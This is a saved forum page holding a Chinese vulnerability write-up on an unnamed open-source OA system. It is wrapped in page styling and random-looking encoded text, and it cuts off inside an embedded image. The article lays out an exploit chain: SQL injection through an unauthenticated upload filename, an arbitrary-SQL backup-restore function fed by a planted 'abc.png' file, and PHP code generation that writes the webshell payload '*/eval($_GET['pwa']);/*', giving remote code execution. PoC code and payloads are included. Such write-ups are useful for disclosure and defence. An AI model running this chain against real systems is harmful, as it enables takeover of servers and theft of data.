JXSQqa0LBVbof0oy7TTUjpQt512Ol9ppzt0Gr3859z7nvTkWCTM9yfWffu9525nv+cKegH+iYdEk+AQ4kKn0C/MEwQS8PcMkWxvMhF1EoM3YDSk6BBJJnrhZk/A74Wb0RnUaPD6e3KEXaZI5RE/J72/sDRYXu/rm3V04HXz7Yeal/STphs7g8HXl7++fHT09ablzWOdh8yeBgu5zmw+7mg1249bGrdZLMftMYv9uDlI7v6F2fz6wNFZfX2vWxo/uLGJ9C9pPtTZvLzp9dFRyOP1pqYNnYcsDR4zNUFJx+3mVshhm6XR8hQ7NQuiIJwsioIoCXVCm9AF9Yr0ZDOu3kQsEjX4XF5/Wu9zkGgimYmlSNI1SHKREAm4HMTYQXxQt2yGjBPB4XY75CKmRCDZlVkitWcJybarx4LkbnITAR6zl2TJ4ZbG27PZ9nF8qchfkvHlcXwOza0DuP4uviYuFDxChzAozAfIEoMkRAzGEBkkmTRAkCIz4EbAn81lE8mEwYiPAwhmwuDh3ZGAR/5AiBgdcDNpNIRIjhJdU2aaranRNTCUlOjYyMgYvdb5qU2bjtR7l69e++XcrFuuW0gkeu7SpfvOeSM02k+Cb2R7t2z95dpV7vmLf3qswfeK3RKzk2JwmjWY6TA2Bdw9EcgDcgptutIo7tpwzv3t8a6l7ea5VyxaeqFRPyZ/840g6R8NvbH7p4vnu1et/eXWLb1jvoZvYx8KRqjnSXGvOCJYBL8wJGwQzhMuFq6G2mZ6E9gDaRhlUWMmzS6bSbonRI0iVD4C9RQTgzQdywxSfyAb4IcQbcbadmCXxTKJGSQWNbSQCLRQBzEajL4kz8Y/QJJqjrGegAhtlIaOHyI0Dz0V9LrO87qwz/b64kGLbpaxt1XOt/YaZ+kswbivjqQWzbRGouzgn9
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}pre code.hljs{overflow-x:auto}.hljs{color:#000}.hljs-comment,.hljs-variable{color:green}.hljs-keyword{color:#00f}.hljs-literal,.hljs-string,.hljs-title{color:#a31515}.hljs-meta{color:#2b91af}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#FFEBE9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#ffffff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body h1{margin:0.67em 0;padding-bottom:0.3em;font-size:2em;border-bottom:1px solid var(--color-border-muted)}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:0.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body h1,.markdown-body h2,.markdown-body h3,.markdown-body h4{margin-top:24px;margin-bottom:16px;font-weight:600;line-height:1.25}.markdown-body h2{font-weight:600;padding-bottom:0.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body h3{font-weight:600;font-size:1.25em}.markdown-body h4{font-weight:600;font-size:1em}.markdown-body ol{padding-left:2em}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body pre{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;word-wrap:normal}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0!important}.markdown-body>*:last-child{margin-bottom:0!importa
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
<!--[if lt IE 9]>
<script src="/static/js/html5shiv.min.js"></script>
<script src="/static/js/respond.min.js"></script>
<![endif]-->
<style>.hot{z-index:10}</style>
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
<body>
<div class="global-nav mb-50">
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container nav">
<div class="visible-xs header-response sf-hidden">
</div>
<div class="row hidden-xs">
<div class="col-sm-9 col-md-9 col-lg-9">
<div class=navbar-header>
<button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
</button>
<div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
</div>
<div class="collapse navbar-collapse" id=global-navbar>
<ul class="nav navbar-nav">
<li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
<li><a href=https://forum.butian.net/questions>问答</a></li>
<li><a href=https://forum.butian.net/shop>商城</a></li>
<li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
<li><a href=https://forum.butian.net/articles>漏洞分析与复现</a>
<span class=hot>NEW</span>
</li>
<li><a href=https://forum.butian.net/movable>活动</a></li>
<li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
</li>
</ul>
<form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
<span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
<input type=text name=word id=searchBox class=form-control placeholder value>
</form>
</div>
</div>
</div>
</div>
</nav>
</div>
<div class="top-alert mt-60 clearfix text-center">
<!--[if lt IE 9]>
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
<a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
</div>
<![endif]-->
</div>
<div class=wrap>
<div class=container>
<div class="row mt-10">
<div class="col-xs-12 col-md-9 main" style=width:100%>
<div class=widget-article>
<h3 class="title word-wrap">某开源OA白名单后缀限制下巧用系统设计getshell</h3>
<ul class=taglist-inline>
</ul>
<div class="content mt-10">
<div class="quote mb-20">
白名单后缀限制下巧用系统设计getshell
</div>
<textarea id=md_view_content style=display:none>白名单后缀限制下巧用系统设计getshell
======================
0x01 路由情况
---------
该 OA 的 `action` 主要是在 `webmain` 目录下
![image-20241212162149500](https://shs3.b.qianxin.com/butian_public/f9f24e7ab921f7a2c0790b9806dc37899.png)
然后通过请求参数中的 `d`、`m`、`a` 定位到具体的 `action` 中的方法进行调到
![image-20241212162759549](https://shs3.b.qianxin.com/butian_public/fe2806ed78974fc90aeaced424d945561.png)
如 `d=systam&amp;m=admin|admin&amp;a=login` 相当于调用 `webmain/system/admin/adminAction.php#login()`
而所有的 action 都会继承 `mainAction`,当我们请求某个 action 时首先会调用父类 `mainAction` 的 `__construct`,进行初始化的一些操作
![image-20241212163105144](https://shs3.b.qianxin.com/butian_public/fb54d0925e84e80397728251472968a5e.png)
其中我们发现有关鉴权的处理被子类的 `initAction` 所实现,比如 apiAction 中
![image-20241212163352786](https://shs3.b.qianxin.com/butian_public/f40c101b8cbc28e53bb155539c626b590.png)
0x02 前台注入
---------
### 2.1 代码分析
在查看 initAction 的实现时发现有个类实现该方法未存在鉴权
![image-20241212164620499](https://shs3.b.qianxin.com/butian_public/f14e870a28a27a71e2593f6644fcb77ff.png)
且其功能点说明是上传文件,我们着重看一下怎么个事
```php
public function xxxxAction()
{
if(!$_FILES)exit('sorry!');
$upimg = c('upfile');
$maxsize= (int)$this-&gt;get('maxsize', $upimg-&gt;getmaxzhao());//上传最大M
$uptypes= 'jpg|png|docx|doc|pdf|xlsx|xls|zip|rar';
$upimg-&gt;initupfile($uptypes, ''.UPDIR.'|'.date('Y-m').'', $maxsize);
$upses = $upimg-&gt;up('file');
if(!is_array($upses))exit($upses);
$arr = c('down')-&gt;uploadback($upses);
$arr['autoup'] = (getconfig('qcloudCos_autoup') || getconfig('alioss_autoup')) ? 1 : 0; //是否上传其他平台
return $arr;
}
```
该方法主要是定义了白名单上传后缀 `$uptypes`,调用 up 方法进行上传后返回文件信息,然后调用 `uploadback`,跟进到其中
```php
public function uploadback($upses, $thumbnail='', $subo=true)
{
$msg = '';
$data = array();
if(is_array($upses)){
$fileext= substr($upses['fileext'],0,10);
$arrs = array(
'adddt' =&gt; $this-&gt;rock-&gt;now,
'valid' =&gt; 1,
'filename' =&gt; $this-&gt;replacefile($upses['oldfilename']),
'web' =&gt; $this-&gt;rock-&gt;web,
'ip' =&gt; $this-&gt;rock-&gt;ip,
'mknum' =&gt; $this-&gt;rock-&gt;get('sysmodenum'),
//'mid' =&gt; $this-&gt;rock-&gt;get('sysmid','0'),
'fileext' =&gt; $fileext,
'filesize' =&gt; (int)$this-&gt;rock-&gt;get('filesize', $upses['filesize']),
'filesizecn'=&gt; $upses['filesizecn'],
'filepath' =&gt; str_replace('../','',$upses['allfilename']),
'optid' =&gt; $this-&gt;adminid,
'optname' =&gt; $this-&gt;adminname,
'comid' =&gt; m('admin')-&gt;getcompanyid(),
);
$arrs['filetype'] = m('file')-&gt;getmime($fileext);
//判断是不是需要压缩jpg和jpeg
...
$bo = $this-&gt;db-&gt;record('[Q]file',$arrs);
if(!$bo)$this-&gt;reutnmsg($this-&gt;db-&gt;error());
$id = $this-&gt;db-&gt;insert_id();
}
```
该方法主要是通过之前 `up` 方法上传文件返回的数组 `$upses` 和全局配置信息构造 `$arrs`,然后调用 `$this-&gt;db-&gt;record` 方法操作 `$arrs`。
来到 `record` 方法
```php
public function record($table,$array,$where='')
{
$addbool = true;
if(!$this-&gt;isempt($where))$addbool=false;
$cont = '';
if(is_array($array)){
foreach($array as $key=&gt;$val){
$cont.=",`$key`=".$this-&gt;toaddval($val)."";
}
$cont = substr($cont,1);
}else{
$cont = $array;
}
$table = $this-&gt;gettables($table);
if($addbool){
$sql="insert into $table set $cont";
}else{
$where = $this-&gt;getwhere($where);
$sql="update $table set $cont where $where";
}
return $this-&gt;tranbegin($sql);
}
```
这里就直接操作 `$array` 为 `key=value` 格式然后逗号拼接后带入到 SQL 语句中执行
控制了$array 中的内容就能实现 SQL 注入,而其中`filename`、`filepath`、`filetype`等这几个键的内容是通过上传文件获取到的,那我们对上传文件名做文章是不是就可以造成 sql 注入呢。
```php
public function up($name,$cfile='')
{
if(!$_FILES)return 'sorry!';
$file_name = $_FILES[$name]['name'];
$file_size = $_FILES[$name]['size'];//字节
$file_type = $_FILES[$name]['type'];
$file_error = $_FILES[$name]['error'];
$file_tmp_name = $_FILES[$name]['tmp_name'];
$zongmax = $this-&gt;getmaxupsize();
if($file_size&lt;=0 || $file_size &gt; $zongmax){
return '文件为0字节/超过'.$this-&gt;formatsize($zongmax).',不能上传';
}
...
return array(
'newfilename' =&gt; $file_newname,
'oldfilename' =&gt; $file_name,
'filesize' =&gt; $file_size,
'filesizecn' =&gt; $file_sizecn,
'filetype' =&gt; $file_type,
'filepath' =&gt; $save_path,
'fileext' =&gt; $file_ext,
'allfilename' =&gt; $allfilename,
'picw' =&gt; $picw,
'pich' =&gt; $pich
);
}else{
return '上传失败:'.$this-&gt;geterrmsg($file_error).'';
}
}
```
通过 `up` 方法的返回值构造可以看到 `oldname` 其实就是上传文件的文件名,这也证实我们的想法。
### 2.2 漏洞复现
![image-20241213160417988](https://shs3.b.qianxin.com/butian_public/f8ec4855bf098b2e9ee66fcfcea7a3d47.png)
0x03 扩大危害 RCE
-------------
#### 3.1 漏洞点
该 cms 自己实现了写入文件接口,我们查看其用法中写入
![image-20241216161934097](https://shs3.b.qianxin.com/butian_public/fdfaa1acf267a19237d4a3b70b08e1efd.png)
通过这么多处调用我们发现有一处调用会写入 php 中
```php
$apaths = ''.P.'xxxx/mode_'.$modenum.'Action.php';
$apath = ''.ROOT_PATH.'/'.$apaths.'';
if(!file_exists($apath)){
$stra = '&lt;?php
/**
* 此文件是【'.$modenum.'.'.$rs['name'].'】。
*/
....
';
$this-&gt;rock-&gt;createtxt($apaths, $stra);
}
```
要是我们能控制 `$modenum` 或是 `$rs['name']` 的内容就可以 getshell不过 `$modenum` 同时也控制了文件名所以我们只能通过控制 `$rs['name']` 来 getshell。
```php
$setid = (int)$this-&gt;get('setid','0');
$rs = m('flow_set')-&gt;getone("`id`='$setid'");
if(!$rs)exit('sorry!');
$rs['xxx'] = count(explode(',', (string)$rs['tables']));
$modenum = $rs['num'];
```
而 `$rs` 数组是由 `flow_set` 数据库获取到的,
![image-20241213165334926](https://shs3.b.qianxin.com/butian_public/fb6c35cc694af6040890a909ffc76b7db.png)
下面是 `flow_se` 默认的数据信息,要是我们可以插入或者修改数据就可以。
#### 3.2 寻找漏洞触发点
根据常规思路我们只要寻找有插入 `flow_set` 表的方法即可。还真被我找到一个
```php
public function xxxAction()
{
$name = $this-&gt;rock-&gt;xssrepstr($this-&gt;post('name'));
$fields = c('pingyin')-&gt;get($name,1);
..
$num = 'zz'.$fields.'';
$id = 0;
$uarr['name'] = $name;
$uarr['num'] = $num;
$uarr['table'] = $num;
...
$id = m('flow_set')-&gt;insert($uarr);
```
构造 poc闭合前面写入文件时的注释为
```php
*/eval($_GET['a']);/*
```
实际发现在 `$this-&gt;rock-&gt;xssrepstr` 中对特殊字符做了处理
```php
public function xssrepstr($str)
{
$xpd = explode(',','(,), , ,&lt;,&gt;,\\,*,&amp;,%,$,^,[,],{,},!,@,#,",+,?,;\'');
$xpd[]= "\n";
return str_ireplace($xpd, '', $str);
}
```
括号之类的都被过滤点了,这个利用点看来无法利用了,那我们只能再找找有没有可以执行 SQL 语句且传参会不进行过滤的点。
通过在 web 目录下查找系统重写的 sql 执行方法 `query`,在某处方法中找到疑似执行任意 sql 语句的方法
```php
if(getconfig('systype')=='demo')exit();
if($this-&gt;adminid!=1)return '只有ID=1的管理员才可以用';
$folder = $this-&gt;post('folder');
$sida = explode(',', $this-&gt;post('sid'));
$alltabls = $this-&gt;db-&gt;getalltable();
$shul = 0;
$tablss = '';
foreach($sida as $id){
$ids = substr($id,0,-5);
$ida = explode('_', $ids);
$len = count($ida);
$fieldshu = $ida[$len-2];
$total = $ida[$len-1];
$tab = str_replace('_'.$fieldshu.'_'.$total.'.json','', $id); //表
$filepath = ''.UPDIR.'/data/'.$folder.'/'.$id.'';
if(!file_exists($filepath))continue;
$data = m('beifen')-&gt;getbfdata('',$filepath);
if(!$data)continue;
$dataarr = $data[$tab];
//表不存在
if(!in_array($tab, $alltabls)){
$createsql = arrvalue($dataarr, 'createsql');
if($createsql){
$this-&gt;db-&gt;query($createsql, false);
}else{
continue;
}
}
```
在该方法中通过处理传入的 `sid`,获取 table 名,如果 table 名不在数据库所有表名中时,会获取某个目录下 `$sid` 名的文件内容作为数组并取得 `createsql` 的内容进行 sql 语句执行。
那么就是说如果 `sid` 可控文件内容,同时 `sid` 不在表内那么我们就能构造修改 `flow_set` 数据的 sql而且目录 `folder` 也是可控的,似乎离成功近在咫尺了,我们找找有没有方法可以写入文件。
在用上面方法寻找文件写入的方法是我们发现好多文件名都是带了随机数,这不太好控制其位置,所以我们要找一个文件名不带随机数的写入点。
比如下面这个
```php
public function savetopdfAjax()
{
$imgbase64 = $this-&gt;post('imgbase64');
if(isempt($imgbase64))return returnerror('无数据');
$path = ''.UPDIR.'/logs/'.date('Y-m').'/abc.png';
$bo = $this-&gt;rock-&gt;createtxt($path, base64_decode($imgbase64));
if(!$bo)return returnerror(''.UPDIR.'目录无写入权限');
$pa1 = ''.ROOT_PATH.'/include/fpdf/fpdf.php';
if(!file_exists($pa1))return returnerror('没有安装fpdf插件');
include_once($pa1);
$fpdf = new FPDF();
$fpdf-&gt;AddPage();
$fpdf-&gt;Image($path,0,0);
$fpdf-&gt;Output('F',''.UPDIR.'/logs/'.date('Y-m').'/to.pdf');
$this-&gt;showreturn('ok:'.$fpdf-&gt;GetPageHeight().'');
}
```
该方法首先是根据 `imgbase64` 上传一个 `abc.png` 文件,其次是一个 pdf 文件,因为默认没这个插件所以实际发包会报错,但不影响 `abc.png` 上传操作的执行。
于是构造文件内容的 poc 为
```php
&lt;?php
$arr = array(
"abc.png" =&gt; array("createsql" =&gt; "update flow_set set name=\"*\/eval($_GET\['pwa'\]);\/*\" where id=160;")
);
echo base64_encode(json_encode($arr));
```
第一层数组的键为文件名,为得是符合上面方法中 `$dataarr= $data[$tab]` 获取到我们后面数组 `$tab` 其实就是传入的文件名参数。第二层数组就是实际执行的 SQL 语句,其实 id 值是默认数据库中最后一行数据的 id 值。
此方法上传的文件位置为 `upload/logs/2024-12/abc.png`。
### 3.3 漏洞复现
整个过程就是
1. `savetopdfAjax` 上传内容为恶意 sql 语句的图片。
2. 请求接口触发图片内容中的恶意 SQL 语句
3. 将更新数据表后带有 payload 的 name 值写入到 php 文件中,成功实现 getshell。
首先上传图片
![image-20241216162324015](https://shs3.b.qianxin.com/butian_public/fcf091b86de7305eefd7a4609329b11e9.png)
![image-20241216172602175](https://shs3.b.qianxin.com/butian_public/fc958e3ffb7165d928bf0b5990c96fd7b.png)
`flow_set` 表中默认的数据都是存在相应的 `PHP` 文件的,我们得新插入一条数据进行上述操作才能生成恶意的 php 文件。
我们用之前找到的插入 `flow_set` 数据的接口进行插入
![image-20241216171220565](https://shs3.b.qianxin.com/butian_public/f2793082e2003e86165467e140d21f36a.png)
此时数据表为
![image-20241216171531719](https://shs3.b.qianxin.com/butian_public/f927e5470dbbcd6cf68feb35772580ae1.png)
记住这个 id 和 num 的值,我们根据 `id` 值重新生成 `abc.png` 的内容,然后进行恶意 sql 更新
![image-20241216171828636](https://shs3.b.qianxin.com/butian_public/f4875c55f2f7b83edeb90d4b3773a7345.png)
![image-20241216172703638](https://shs3.b.qianxin.com/butian_public/ff30ee3acec5e6109d8ce70e97c7647e3.png)
通过数据表可以看到成功修改了数据表中的内容,然后我们需要触发 `php` 文件的写入
![image-20241216172801491](https://shs3.b.qianxin.com/butian_public/f6a0ccca9d30d8e84976e682afa2f0d9a.png)
找到 `mode_zzmixnpgAction.php`,可以看到成功写入
![image-20241216172940396](https://shs3.b.qianxin.com/butian_public/fec8fcc5dc2622f8d116f00fa2212c446.png)
因为该文件在 web 目录下所以我们可以通过系统的路由方式来访问
![image-20241216173603567](https://shs3.b.qianxin.com/butian_public/f388bf7a8f31d3dcc86359b4869777885.png)
可以看到成功执行代码。</textarea>
<div id=layer-photos-demo>
<div id=md_view><div class=markdown-body><h1 blockindex=0>白名单后缀限制下巧用系统设计getshell</h1>
<h2 blockindex=1>0x01 路由情况</h2>
<p blockindex=2>该 OA 的 <code>action</code> 主要是在 <code>webmain</code> 目录下</p>
<p blockindex=3><img src="data:image/png;base64,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